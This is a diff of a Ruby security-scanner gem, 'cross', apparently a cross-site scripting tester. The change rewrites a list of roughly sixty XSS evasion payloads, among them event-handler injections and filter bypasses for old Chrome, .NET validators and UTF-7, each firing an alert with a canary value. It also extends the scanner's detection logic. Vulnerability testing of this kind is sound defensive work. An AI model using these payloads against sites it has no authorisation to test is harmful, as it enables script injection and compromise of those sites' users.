cross 0.50.0 → 0.60.0
- checksums.yaml +4 -4
- data/lib/cross/engine.rb +9 -5
- data/lib/cross/version.rb +1 -1
- data/lib/cross/xss.rb +61 -59
- metadata +1 -1
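--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA1:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
+data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
+data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6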
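--- a/data/lib/cross/engine.rb
+++ b/data/lib/cross/engine.rb
@@ -75,8 +75,8 @@ module Cross
 
 scripts = page.search("//script")
 scripts.each do |sc|
-$logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(
-return true if sc.children.text.include?("alert(
+$logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
 end
 
 return false if options[:oneshot]
@@ -115,8 +115,6 @@ module Cross
 ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
 ff.value = pattern if ff.name==options[:parameter_to_tamper]
 
-
-# promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
 end
 end
 
@@ -126,7 +124,13 @@ module Cross
 $logger.err "Page is empty" if pp.body.empty?
 scripts = pp.search("//script")
 scripts.each do |sc|
-return true if sc.children.text.include?("alert(
+return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+end
+
+# This is for input html field javascript event evasion
+inputs = pp.search("//input")
+inputs.each do |input|
+return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
 end
 end
 return false if options[:oneshot]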
data/lib/cross/version.rb
CHANGED
data/lib/cross/xss.rb
CHANGED
@@ -2,69 +2,71 @@ module Cross
|
|
2
2
|
module Attack
|
3
3
|
class XSS
|
4
4
|
|
5
|
+
CANARY = 666
|
6
|
+
|
5
7
|
def self.each
|
6
8
|
|
7
9
|
evasions = [
|
8
|
-
"
|
9
|
-
"<script>alert(
|
10
|
-
"
|
11
|
-
"/--><script>alert(
|
12
|
-
"
|
13
|
-
"/--></ScRiPt><ScRiPt>alert(
|
14
|
-
"
|
15
|
-
"//;-->alert(
|
16
|
-
"
|
17
|
-
"\"//;\nalert(
|
18
|
-
"
|
10
|
+
"a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
|
11
|
+
"<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
|
12
|
+
"<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
|
13
|
+
"/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
|
14
|
+
"/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
|
15
|
+
"/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
|
16
|
+
"/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
|
17
|
+
"//;-->alert(#{Cross::Attack::XSS::CANARY})",
|
18
|
+
"//;-->alert(#{Cross::Attack::XSS::CANARY});",
|
19
|
+
"\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
|
20
|
+
"\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
|
19
21
|
# more exotic vectors (antisnatchor's collection)
|
20
|
-
"<script/anyjunk>alert(
|
21
|
-
"<<script>alert(
|
22
|
-
"<img onerror=alert(
|
23
|
-
"<xml onreadystatechange=alert(
|
24
|
-
"<style onreadystatechange=alert(
|
25
|
-
"<iframe onreadystatechange=alert(
|
26
|
-
"<object onerror=alert(
|
27
|
-
"<object type=image src=/images/live.gif onreadystatechange=alert(
|
28
|
-
"<img type=image src=/images/live.gif onreadystatechange=alert(
|
29
|
-
"<input type=image src=/images/live.gif onreadystatechange=alert(
|
30
|
-
"<isindex type=image src=/images/live.gif onreadystatechange=alert(
|
31
|
-
"<script onreadystatechange=alert(
|
32
|
-
"<bgsound onpropertychange=alert(
|
33
|
-
"<body onbeforeactivate=alert(
|
34
|
-
"<body onfocusin=alert(
|
35
|
-
"<input autofocus onfocus=alert(
|
36
|
-
"<input onblur=alert(
|
37
|
-
"<body onscroll=alert(
|
38
|
-
"</a onmousemove=alert(
|
39
|
-
"<video src=1 onerror=alert(
|
40
|
-
"<audio src=1 onerror=alert(
|
41
|
-
"<object data=javascript:alert(
|
42
|
-
"<iframe src=javascript:alert(
|
43
|
-
"<embed src=javascript:alert(
|
44
|
-
"<form id=test /><button form=test formaction=javascript:alert(
|
45
|
-
"<event-source src=javascript:alert(
|
46
|
-
"<x style=behavior:url(#default#time2) onbegin=alert(
|
47
|
-
"<x style=x:expression(alert(
|
48
|
-
"<x onclick=alert(
|
49
|
-
"<img onerror=\"alert(
|
50
|
-
"<img onerror=`alert(
|
51
|
-
"<img/onerror=\"alert(
|
52
|
-
"<img onerror=alert(
|
53
|
-
"<img onerror=alert(
|
54
|
-
"<img onerror=alert(
|
55
|
-
"<img onerror=alert(
|
56
|
-
"<img onerror=alert(
|
57
|
-
"<img onerror=alert(
|
58
|
-
"<img onerror=alert(
|
59
|
-
"<img onerror=alert(
|
60
|
-
"<img onerror=alert(
|
61
|
-
"<script>function::['alert'](
|
62
|
-
"<svg><script>//
alert(
|
63
|
-
"<script>/*///*/alert(
|
64
|
-
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(
|
65
|
-
"+ADw-script+AD4-alert(
|
66
|
-
"},alert(
|
67
|
-
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(
|
22
|
+
"<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
|
23
|
+
"<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
|
24
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
25
|
+
"<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
26
|
+
"<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
27
|
+
"<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
28
|
+
"<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
|
29
|
+
"<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
|
30
|
+
"<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
31
|
+
"<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
32
|
+
"<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
33
|
+
"<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
|
34
|
+
"<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
|
35
|
+
"<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
|
36
|
+
"<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
|
37
|
+
"<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
|
38
|
+
"<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
|
39
|
+
"<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
|
40
|
+
"</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
|
41
|
+
"<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
|
42
|
+
"<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
|
43
|
+
"<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
44
|
+
"<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
45
|
+
"<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
46
|
+
"<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
47
|
+
"<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
|
48
|
+
"<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
|
49
|
+
"<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
|
50
|
+
"<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
|
51
|
+
"<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
|
52
|
+
"<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
|
53
|
+
"<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
|
54
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
55
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
56
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
57
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
58
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
59
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
60
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
61
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
62
|
+
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
|
63
|
+
"<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
|
64
|
+
"<svg><script>//
alert(#{Cross::Attack::XSS::CANARY})</script>", #Chrome <= 18 XssAuditor bypass
|
65
|
+
"<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", #Chrome <= 20 XssAuditor bypass
|
66
|
+
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", #.NET RequestValidator bypass
|
67
|
+
"+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
|
68
|
+
"},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
|
69
|
+
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
|
68
70
|
]
|
69
71
|
evasions.each do |pattern|
|
70
72
|
yield pattern if block_given?
|